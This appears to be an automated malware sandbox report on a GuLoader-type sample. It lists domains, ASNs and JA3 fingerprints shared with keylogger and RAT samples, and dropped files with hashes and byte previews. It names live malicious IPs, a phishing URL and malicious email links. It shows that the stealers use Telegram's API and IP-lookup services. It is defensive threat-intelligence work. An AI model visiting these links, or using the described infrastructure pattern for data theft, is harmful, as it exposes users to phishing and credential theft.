checkip.dyndns.com	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
api.telegram.org	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
ORACLE-BMC-31898US	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
OVHFR	4.elf	Get hash	malicious	Unknown	Browse	164.133.191.35
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	51.178.95.194
	https://www.depoqq.win/geno	Get hash	malicious	Unknown	Browse	54.36.150.184
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	51.195.88.199
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DwyWG_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLQ6-2Bsxhj60Ehn0XDEyVD6MCEZ1gioYU2lwgwkCuP2dHRX-2FYdZnQ31dEdwKW37GtXYj9HmZ1F0YrZWwSELmaO5K7noqwYAhu2QGcGqOtQYdjShoJMVTWOe6BTzZXQxib8Y6rd4SX-2BUwZMt-2BbgPIpal6PcS8i4PCSiFy8RF-2Ftt22Wpj713n23BIU6an4375YDP3	Get hash	malicious	Unknown	Browse	51.38.120.206
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyi	Get hash	malicious	Unknown	Browse	51.75.86.98
	3.elf	Get hash	malicious	Unknown	Browse	164.133.191.143
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DrgFz_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLui8UPBZcrEcBQ64UpH2s9-2FDpSu9qfcgYFRQKTYsD5OOP7p7kgdevUOf60UO0BtzRorOOVdIMlEbf0g38VGeCmtkP8At2J-2BxKEtoZ2O48KqLdUMGUmxH4Esb-2BPRc25uZJoq4Qo0YWw9j31285luIdhLwnz-2B9RfofSABy36tB5aPmDcVeLn5C5N5AJkqjfepa6	Get hash	malicious	Unknown	Browse	51.89.9.252
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgBe3vvPhUi3NCctiT7ICCnQ-2FY8o5rhg4URlGJ-2FvsNaBLrMZH2YOUKWM-2BCE-2FXqUBn4SuSDNO43ZHONlcfV0u69WPaY48i3uh3m8lqIzkUcMcKGiml1g6PtP2N9Fq73ADmecSkBDQ1wDesGGu-2Bg3LC1PY31AnFBjTo5itfBoUzfV1y-2FNuV7ub4JBfgFfFwbfDCVw04z2QHPGmvaTuYBRiOw1Tpn5jhya1bpe-2FZKFIvw6DpoIa015fiQnAkr21qCIGDz3kcWaHiPPoAcEbgrIJQtXRwdHoKOAHjnLbHeTfYxioE2jQ-2BKzgO6L-2FLiLt79tmJXX2KYx8D6DTv7nI91sFKT8dXMJM0DazaslrneD4lIUneNyaGARqqUVvrSB7-2BzgxAL-2FuXFyd1qjf-2FnnaV5h661BgCBEWKyZBkPjSGhvc635VlrPtfR5g3T0pDVRqQ8o-2Fg4-3DfYwI_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419PER4av1iPHZIu7rMCH4g59O-2FpVm-2BPXLGfx0fQIDbM830SEyalx7CL7LS5G2wzbNPhsJ2FagkVeT-2FvL4PXhjlJE5YFKw59He2Ja9QVSEHwhUEJm-2BBDxFee6A4QFWAIxMlxI8kis-2B4bFFLDszJAKx313jD-2F4FRd82vUXuacU2lSKZ4Ah2gmv6sbaeoxYrNwq4bbw0e0DJ7EzH1nxfqSXJpTz	Get hash	malicious	Unknown	Browse	51.89.9.254
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	51.178.195.216
CLOUDFLARENETUS	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	172.64.155.59
	3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	wSoShbuXnJ.exe	Get hash	malicious	FormBook	Browse	104.21.86.111
	1507513743282749438.js	Get hash	malicious	Strela Downloader	Browse	162.159.61.3
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	C6Abn5cBei.exe	Get hash	malicious	FormBook	Browse	172.67.145.234
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZFCKpFXpzx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZFCKpFXpzx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZeAX5i7cGB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	jKqPSehspS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	A6AHI7Uk18.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Wru9ycO2MJ.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	iNFGd6bDZX.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MyzWeEOlqb.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	AM983ebb5F.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.185.129
	av8XPPpdBc.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.185.129
	QNuQ5e175D.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.185.129
	7uY105UTJU.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.185.129
	QNuQ5e175D.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.185.129
	iwEnYIOol8.exe	Get hash	malicious	FormBook, GuLoader	Browse	216.58.206.78 142.250.185.129
	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	216.58.206.78 142.250.185.129
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	216.58.206.78 142.250.185.129
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	216.58.206.78 142.250.185.129
	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	216.58.206.78 142.250.185.129

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll	Hornswoggle.exe	Get hash	malicious	GuLoader	Browse
	Hornswoggle.exe	Get hash	malicious	GuLoader	Browse
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	anziOUzZJs.exe	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe	Get hash	malicious	Unknown	Browse
	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	780
Entropy (8bit):	3.3278566431392878
Encrypted:	false
SSDEEP:	12:8wl0S0sXMlykX6RXUkl1klTkXg1MJGc3IrRu/jNJkKAp4t2YZ/elFlSJm:8qr/R1ExoFIrR2hHAzqy
MD5:	70845CE8C7B20D22C5DC341F2F5E8B7A
SHA1:	5C1556475CEC538F5D63DBDD5434AFD07986E985
SHA-256:	31528F4296181969700B4E62B058523653349CE0CF8FD440183B95BE93528588
SHA-512:	AD6EE2551C1063C4C333CC8DD88435C9647C236549510C1C397F17A81CAC090CD4FFFC9D4A19399B60B470C458D040E156029C2038EFC21F83542EA8B2195D95
Malicious:	false
Reputation:	low
Preview:	L..................F........................................................C....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....h.2...........Filial195.plo.L............................................F.i.l.i.a.l.1.9.5...p.l.o.............\.....\.....\.....\.....\.F.i.l.i.a.l.1.9.5...p.l.o.;.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.c.h.i.n.a.\.M.i.x.e.r.e.n.\.v.e.r.b.a.l.i.s.e.s.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c543klpu.pdb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lodbonk4.gac.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skhhuy0i.acw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnivwamo.xht.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nso347D.tmp

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	data
Category:	dropped
Size (bytes):	3773775
Entropy (8bit):	1.4006245892520421
Encrypted:	false
SSDEEP:	6144:7ogX0B5jG+rwhIGahreDm1hs3zCU9jkogB9TtN2757cdLXBxRKPDu6aY1amIO1rR:v0zimOc6Dm1hGOUuB96d2tfkUzM9
MD5:	6058BEFAEA98E659A3385190DC05FD52
SHA1:	C6E98CB4BE076EE3EEAE5D2AAABE1321D94E0262
SHA-256:	0A9DE9295D10641A1B75670929F257C25495B5391642784D997B12FC7A8E9E30
SHA-512:	CAA84AA9B83C29CBEC480FA53E67864C056D4F033D624EAC503A1441129E4001A3004317846090B8232FB66F426394AB0EB333757CC1D22165B4F93687A83C6F
Malicious:	false
Preview:	u"......,................................!......]"...............................................k\.........................................................................................................................................................................................J...\...............j...............................................................................................................................g...............6...Y...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	6656
Entropy (8bit):	4.994861218233575
Encrypted:	false
SSDEEP:	96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
MD5:	B648C78981C02C434D6A04D4422A6198
SHA1:	74D99EED1EAE76C7F43454C01CDB7030E5772FC2
SHA-256:	3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
SHA-512:	219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Hornswoggle.exe, Detection: malicious, Browse Filename: Hornswoggle.exe, Detection: malicious, Browse Filename: Overheaped237.exe, Detection: malicious, Browse Filename: 66776676676.exe, Detection: malicious, Browse Filename: anziOUzZJs.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nondecreasing.Vgt

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	data
Category:	dropped
Size (bytes):	344455
Entropy (8bit):	7.60264749629237
Encrypted:	false
SSDEEP:	6144:gX0B5jG+rwhIGahreDm1hs3zCU9jkogB9TtN2757y:y0zimOc6Dm1hGOUuB96dy
MD5:	8FB7148F8DBDA5B61030F3DFB6D7FA25
SHA1:	DA981906695B80CE5E6C8F7E20E945E6A0899AA7
SHA-256:	F3266F0AA22192F9E01248A771505A0FE3C05FF63FC7A88CE56ADE7D7AF20903
SHA-512:	EDF1B8A264FA98131933F3A5C734BBF1631941F648EEB89742C0C6CD43225D67BF99C221E7B23817A0C9F6DE1F54887F4D1650DB9805C459DBAB007F1E5F514B
Malicious:	false
Preview:	........................%%......:............................................55.....................\|...................P..........[.......rr.ttt.b............................))...///..`.A..............\../....D......EEE...2...__.......t.....__.........{{{.77.....g...11..*.....<..AA...h...................nnn.II..;.............5...c.........I..............S..........................\|\|\|\|\|....A.GGG.............tttt......7....ee.......>>>>>>>>.EEEEEEE.pp.}.gg.........................##...a.....}...i.\\.............ZZ.......pp.....................AAA............(........zz....EE......(.....PP.......I......_.......y..........sss....Q.G....3.u....88.o......................&....___......~..000....!...........8...nn..........$..........s....F.......................<...{{....r................Z.........ii...,,...&&...........^........................ZZZ...:::::::............................j...................................44..22......Q.......................ooo../...@.......@@.................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4279), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	68092
